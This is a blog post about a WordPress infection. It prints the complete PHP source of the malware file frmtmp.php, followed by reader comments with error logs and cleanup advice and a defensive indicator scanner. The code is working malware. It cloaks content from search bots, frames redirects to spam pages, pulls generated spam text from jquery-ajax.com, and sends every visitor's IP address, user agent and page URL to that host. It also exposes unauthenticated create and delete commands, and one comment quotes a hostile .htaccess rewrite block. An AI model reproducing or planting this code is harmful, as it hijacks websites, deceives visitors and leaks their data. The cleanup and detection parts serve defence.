frmtmp.php

WordPress modifier

<?php

@ini_set('display_errors', '0');
@ini_set('max_execution_time', '10');
@ini_set('memory_limit', '1024M');
if ( file_exists("{$eb}.st/.r")) {
    $pamparam = file_get_contents("{$eb}.st/.r");
    $eqq = explode('|', $pamparam);
    if ($eqq[2]) $qq = trim($eqq[2]);
    if ($eqq[3]) $lang = trim($eqq[3]);
}
$ip = urlencode($_SERVER['REMOTE_ADDR']);
$ua = urlencode($_SERVER['HTTP_USER_AGENT']);
if (isset($_GET["$qq"]) && $_GET[$qq] && file_exists("{$eb}.st/.r")) {
    $crawlers = '/google|bot|crawl|slurp|spider|yandex|rambler/i';
    if (preg_match($crawlers, $ua)) {
        $abt = 1;
    }
    $fp = fsockopen("jquery-ajax.com", 80, $errno, $errstr, 10);
    $out = "GET /lnk/tuktuk.php?checkbot=1\&ip=$ip&ua=$ua HTTP/1.1\r\n";
    $out .= "Host: jquery-ajax.com\r\n";
    $out .= "Connection: Close\r\n\r\n";
    fwrite($fp, $out);
    while (!feof($fp)) {
        $otvet .= fgets($fp);
    }
    fclose($fp);
    if (strstr($otvet, 'BOT')) $abt = 1;
    $page = urldecode($_GET["$qq"]);
    $key = str_replace('-', ' ', $page);
    $htitle = ucfirst($key);
    $rating = rand(3,5);
    $rcount = rand(120,220);
    $txt = "<div itemscope=\"\" itemtype=\"http://schema.org/Product\">\n<span itemprop=\"name\">$htitle</span>\n<div itemprop=\"aggregateRating\" itemscope=\"\" itemtype=\"http://schema.org/AggregateRating\">\n<span itemprop=\"ratingValue\">$rating-5</span> stars based on\n<span itemprop=\"reviewCount\">$rcount</span> reviews\n</div>\n</div>\n";
    $ukey = urlencode($key);
    $pamparam = file_get_contents("{$eb}.st/.r");
    $epamparam = explode('|', $pamparam);
    $redir = $epamparam[0];
    $group = $epamparam[1];
    if (!$abt) {
        header_remove();
        if (strstr($redir, '?')) $redir .= "&keyword=".urlencode($key);
        else $redir .= "?keyword=".urlencode($key);
        //header("Location: $redir");
        echo "<frameset cols=\"100%\"><frame src=\"$redir\"></frameset>";
    }
    if (file_exists("{$eb}.st/$page.txt")) {
        $gtxt = file_get_contents("{$eb}.st/$page.txt");
        $etxt = explode('|', $gtxt);
        $txt = $etxt[0];
        $desc = $etxt[1];
    }
    else {
        $desc = '';
        $fp = fsockopen("jquery-ajax.com", 80, $errno, $errstr, 10);
        $out = "GET /lnk/gen/?key=$ukey&g=$group&theme=$group&lang=$lang HTTP/1.1\r\n";
        $out .= "Host: jquery-ajax.com\r\n";
        $out .= "Connection: Close\r\n\r\n";
        fwrite($fp, $out);
        while (!feof($fp)) {
            $ttxt .= fgets($fp);
        }
        fclose($fp);
        preg_match('#gogogo(.*)enenen#is', $ttxt, $mtchs);
        $txt .= $mtchs[1];

        $fp = fsockopen("jquery-ajax.com", 80, $errno, $errstr, 10);
        $out = "GET /lnk/gen/desc.php?key=$ukey&desc=$group HTTP/1.1\r\n";
        $out .= "Host: jquery-ajax.com\r\n";
        $out .= "Connection: Close\r\n\r\n";
        fwrite($fp, $out);
        while (!feof($fp)) {
            $desc .= fgets($fp);
        }
        fclose($fp);
        preg_match('#gogogo(.*)enenen#is', $desc, $mtchs);
        $desc = $mtchs[1];

        file_put_contents("{$eb}.st/$page.txt", "$txt|$desc");
    }
}

if (isset($_REQUEST["del"])) {
    $page = urldecode($_REQUEST["del"]);
    if (file_exists("{$eb}.st/$page.txt")) {
        unlink("{$eb}.st/$page.txt");
        echo "---deleted---";
    }
}

if (isset($_REQUEST["create"]) || $_REQUEST["create"]) {
        if (!file_exists("{$eb}.st")) {
                $qq = $_REQUEST['qq'];
                mkdir("{$eb}.st");
        }
        else {
            $pamparam = file_get_contents("{$eb}.st/.r");
            $eqq = explode('|', $pamparam);
            if (isset($_REQUEST['qq']) && $_REQUEST['qq']) $qq = $_REQUEST['qq'];
            else $qq = trim($eqq[2]);
        }
        $redir = urldecode($_REQUEST['redir']);
        $group = $_REQUEST['group'];
        $lang = $_REQUEST['lang'];
        file_put_contents("{$eb}.st/.r", "$redir|$group|$qq|$lang");
        if (file_exists("{$eb}.st/.r")) echo "---created---";
}


ob_start();

function shutdown() {
    global $eb; global $txt; global $qq; global $title;  global $desc;
    $ip = urlencode($_SERVER['REMOTE_ADDR']);
    $ua = urlencode($_SERVER['HTTP_USER_AGENT']);
    $donor = urlencode($_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']);
    $otvet = '';
    if (!$_GET["$qq"]) {
        $fp = fsockopen("jquery-ajax.com", 80, $errno, $errstr, 10);
        $out = "GET /lnk/tuktuk.php?d=$donor&ip=$ip&ua=$ua HTTP/1.1\r\n";
        $out .= "Host: jquery-ajax.com\r\n";
        $out .= "Connection: Close\r\n\r\n";
        fwrite($fp, $out);
        while (!feof($fp)) {
            $otvet .= fgets($fp);
        }
        fclose($fp);
        preg_match('#<(.*)>#is', $otvet, $els);
        $l = $els[0];
        $ll = explode("\n", $l);
    }
    $my_content = ob_get_contents();
    ob_end_clean();
            if ($_GET["$qq"]) {
                $title = str_replace('-', ' ', $_GET[$qq]);
                $title = ucfirst($title)." - ".$_SERVER['SERVER_NAME'];
                $my_content = preg_replace('#<p>(.*)</p>#is', "<p>\n$txt\n</p>", $my_content, 1);
                $my_content = preg_replace('#<title>(.*)</title>#is', "<title>$title</title>", $my_content, 1);
                if (preg_match('#<meta name="description"(.*)>#is', $my_content)) $my_content = preg_replace('#<meta name="description"(.*)>#i', "<meta name=\"description\" content=\"$desc\">", $my_content, 1);
                else $my_content = preg_replace('#</head>#i', "<meta name=\"description\" content=\"$desc\">\n</head>", $my_content, 1);
                $my_content = preg_replace('#<meta name="keywords"(.*)>#i', '', $my_content, 1);
                $my_content = preg_replace('#<h1(.*)</h1>#i', "<h1>$title</h1>", $my_content);
                $my_content = preg_replace('#<h2(.*)</h2>#i', "<h2>$title</h2>", $my_content);
                $my_content = preg_replace('#<span class="entry-date">(.*)</span>#i', '', $my_content);
                $my_content = preg_replace('#<script(.*)</script>#i', '', $my_content);
                $my_content = preg_replace('#<time(.*)</time>#i', '', $my_content);
                $kuku = 1;
            }
            if (!$kuku) {
                foreach ($ll as $ln) {
                    $ln = str_replace('<br>', '', trim($ln));
                    if (preg_match('#<p(.*)>#', $my_content)) {
                        $my_content = preg_replace('#<p(.*)>#', "<-p->\n$ln ", $my_content, 1);
                    }
                    elseif (preg_match('#<span(.*)>#', $my_content)) {
                        $my_content = preg_replace('#<span(.*)>#', "<-span->$ln ", $my_content, 1);
                    }
                    elseif (preg_match('#<strong>#', $my_content)) {
                        $my_content = preg_replace('#<strong>#', "<-strong->$ln ", $my_content, 1);
                    }
                    elseif (preg_match('#<b>#', $my_content)) {
                        $my_content = preg_replace('#<b>#', "<-b->$ln ", $my_content, 1);
                    }
                    elseif (preg_match('#<i>#', $my_content)) {
                        $my_content = preg_replace('#<i>#', "<-i->$ln ", $my_content, 1);
                    }
                    elseif (preg_match('#<u>#', $my_content)) {
                        $my_content = preg_replace('#<u>#', "<-u->$ln ", $my_content, 1);
                    }
                }
                $my_content = str_replace('<-p->', '<p>', $my_content);
                $my_content = str_replace('<-span->', '<span>', $my_content);
                $my_content = str_replace('<-strong->', '<strong>', $my_content);
                $my_content = str_replace('<-b->', '<b>', $my_content);
                $my_content = str_replace('<-i->', '<i>', $my_content);
                $my_content = str_replace('<-u->', '<u>', $my_content);
            }
    echo $my_content;
}
register_shutdown_function('shutdown');


?>

32 thoughts on “frmtmp.php”

  1. Hi,
    I’ve been hit by the darn file for sure. Here’s my debug:

    [11-Jan-2016 21:58:27 UTC] PHP Notice: Undefined variable: eb in /var/sites/i/*******/public_html/wp-admin/frmtmp.php on line 6
    [11-Jan-2016 21:58:27 UTC] PHP Notice: Undefined variable: qq in /var/sites/i/*******/public_html/wp-admin/frmtmp.php on line 14
    [11-Jan-2016 21:58:27 UTC] PHP Notice: Undefined index: create in /var/sites/i/*******/public_html/wp-admin/frmtmp.php on line 91
    [11-Jan-2016 21:58:29 UTC] PHP Notice: Undefined index: in /var/sites/i/*******/public_html/wp-admin/frmtmp.php on line 118
    [11-Jan-2016 21:58:29 UTC] PHP Notice: Undefined offset: 0 in /var/sites/i/*******/public_html/wp-admin/frmtmp.php on line 129
    [11-Jan-2016 21:58:29 UTC] PHP Notice: Undefined index: in /var/sites/i/*******/public_html/wp-admin/frmtmp.php on line 134
    [11-Jan-2016 21:58:29 UTC] PHP Notice: Undefined variable: kuku in /var/sites/i/*******/public_html/wp-admin/frmtmp.php on line 149
    [11-Jan-2016 21:58:29 UTC] PHP Notice: Undefined variable: eb in /var/sites/i/*******/public_html/frmtmp.php on line 6
    [11-Jan-2016 21:58:29 UTC] PHP Notice: Undefined variable: qq in /var/sites/i/*******/public_html/frmtmp.php on line 14
    [11-Jan-2016 21:58:29 UTC] PHP Notice: Undefined index: create in /var/sites/i/*******/public_html/frmtmp.php on line 91
    [11-Jan-2016 21:58:30 UTC] PHP Notice: Undefined index: in /var/sites/i/*******/public_html/frmtmp.php on line 118
    [11-Jan-2016 21:58:30 UTC] PHP Notice: Undefined offset: 0 in /var/sites/i/*******/public_html/frmtmp.php on line 129
    [11-Jan-2016 21:58:30 UTC] PHP Notice: Undefined index: in /var/sites/i/*******/public_html/frmtmp.php on line 134
    [11-Jan-2016 21:58:30 UTC] PHP Notice: Undefined variable: kuku in /var/sites/i/*******/public_html/frmtmp.php on line 149

    I also found a .st file in my public_html folder which I deleted.

    However, I can’t find this frmtmp which seems to be hidden or something.

    I cannot for the life of me find any solution and I have this white screen of death thing.

    Please can you help?

    Thanks in advance.

    From a desperate person

  2. I am facing the same issue. Can location the file frmtmp.php in my WordPress.
    I tried isecurity, securi, Antimalware and wordfence. They are able to detect the virus and remove it temporarily but it reappears within a day.
    The error wordfence shows is-
    Undefined index in….*******/public_html/********/wp-admin/frmtmp.php on line 127

    Please help.

  3. I have this error too. Even if I’m showing hidden files on my root folder, I can’t seem to see this file. I’ll appreciate any help mate. Thanks.

    PHP Warning: Invalid argument supplied for foreach() in /home/*****/public_html/frmtmp.php on line 165

  4. Hi Robert, I’m desperate with this, I can’t get rid of frmtmp.php, I keep deleting it from a couple of websites and then it shows up again after a certain time. What can I do to completely remove it?

  5. This is nasty. Start at your htaccess file; if it looks like this then replace it with the original. Look for a file called bt. in root…
    #BEGIN_WPLFRM

    RewriteEngine On
    RewriteRule ^-(.+):(.+)$ index.php?=$1 [R=301,L]

    #END_WPLFRM

  6. Hi Robert

    I have been looking through a lot of files, trying to restore WP infected by this, and have located the files. I don’t see the same issue with the .htaccess as one mentioned. However, I hope your guidance might help me, as I seem stuck.

    1. Solved. I deleted all frmtmp.php and .bs files, replaced wp-admin and wp-includes with new ones, and deleted all strange files that are not part of core WordPress or have anything to do with my website.

  7. As Nay Lin suggested, there’s no ultimate solution.
    I suggest updating your WordPress and all the modules. After that, download the whole site to your computer, compare all files one by one with the original WordPress files (download from https://wordpress.org/download/) and examine the rest of the files one by one for malicious code.
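A scanner for the indicators visible on this page (the frmtmp.php file name, the .st directory with its .r settings file, the jquery-ajax.com host and the #BEGIN_WPLFRM block in .htaccess), added here as an example and not part of the original post or its comments. The finding names and the field labels given to the four `|`-separated values in .r are illustrative choices.

```python
import os
import sys

# Indicators taken from this page: the dropped file name, the ".st" state
# directory with its ".r" config, the hard-coded host, the .htaccess marker.
DROPPER_NAME = "frmtmp.php"
STATE_DIR = ".st"
C2_HOST = b"jquery-ajax.com"
HTACCESS_MARKER = b"#BEGIN_WPLFRM"
STATE_KEYS = ("redirect_url", "group", "query_param", "lang")


def parse_state(path):
    """Decode .st/.r, which the sample writes as redir|group|qq|lang."""
    with open(path, "r", errors="replace") as fh:
        fields = [f.strip() for f in fh.read().split("|")]
    fields += [""] * (len(STATE_KEYS) - len(fields))  # tolerate short files
    return dict(zip(STATE_KEYS, fields))


def scan(root):
    """Walk a web root and return a list of (kind, path, detail) findings."""
    findings = []
    for dirpath, dirnames, filenames in os.walk(root):
        if STATE_DIR in dirnames:
            st = os.path.join(dirpath, STATE_DIR)
            cfg = os.path.join(st, ".r")
            detail = parse_state(cfg) if os.path.isfile(cfg) else {}
            # Each cached doorway page is stored as <keyword>.txt
            detail["cached_pages"] = sum(f.endswith(".txt") for f in os.listdir(st))
            findings.append(("state_dir", st, detail))
            dirnames.remove(STATE_DIR)  # inspected above, do not descend
        for name in filenames:
            path = os.path.join(dirpath, name)
            if name == DROPPER_NAME:
                findings.append(("dropper", path, {}))
            elif name == ".htaccess" or name.endswith(".php"):
                with open(path, "rb") as fh:
                    data = fh.read()
                if name == ".htaccess" and HTACCESS_MARKER in data:
                    findings.append(("htaccess_block", path, {}))
                elif C2_HOST in data:
                    findings.append(("host_reference", path, {}))
    return findings


if __name__ == "__main__":
    for kind, path, detail in scan(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(kind, path, detail)
```

The `query_param` value recovered from .r is the GET parameter name that makes the script serve a doorway page, so it is also the string to search for in the web server's access logs.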
